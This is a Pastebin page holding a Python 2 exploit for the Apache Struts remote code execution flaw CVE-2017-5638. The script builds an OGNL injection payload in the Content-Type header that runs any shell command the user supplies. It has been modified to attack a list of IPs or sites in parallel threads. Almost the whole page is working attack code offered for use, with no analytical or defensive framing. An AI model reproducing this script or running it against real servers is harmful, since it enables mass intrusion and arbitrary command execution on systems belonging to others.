Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python # CVE-2017-5638
- # Modded By: LiGhT # Added multi-target and multi-threading
- # Original By: Nike Zheng
- # Source: http://www.hackplayers.com/2017/03/exploit-rce-para-apache-struts-cve-2017-5638.html
- # P.S. You can't be an idiot
- import sys, os, threading, time, re
- import urllib2, requests, httplib
- from requests.packages.urllib3.exceptions import InsecureRequestWarning
- requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
- if len(sys.argv) < 3:
- print "Apache Struts (CVE-2017-5638) RCE Exploit\n"
- print "Usage: python "+sys.argv[0]+" <List.txt(ips/sites)> <cmd>"
- print "\nExample: python "+sys.argv[0]+" sites.txt whoami"
- sys.exit()
- hacks = open(sys.argv[1], "r").readlines() #list of ips or sites
- cmd = str(sys.argv[2]) #command to execute
- def exploit(url):
- payload = "Content-Type:%{(#_='multipart/form-data')."
- payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
- payload += "(#_memberAccess?"
- payload += "(#_memberAccess=#dm):"
- payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
- payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
- payload += "(#ognlUtil.getExcludedPackageNames().clear())."
- payload += "(#ognlUtil.getExcludedClasses().clear())."
- payload += "(#context.setMemberAccess(#dm))))."
- payload += "(#cmd='%s')." % cmd
- payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
- payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
- payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
- payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
- payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
- payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
- payload += "(#ros.flush())}"
- try:
- headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
- request = requests.get(url, headers=headers,verify=False)
- except httplib.IncompleteRead, e:
- request = e.partial
- print request
- #if "tomcat" in request:
- # print "YEET"
- #else:
- # pass
- for url in hacks:
- try:
- if "http://" not in url:
- url = "http://"+url+"/"
- else:
- url = url+"/"
- strut = threading.Thread(target=exploit, args=(url,))
- strut.start()
- except:
- pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement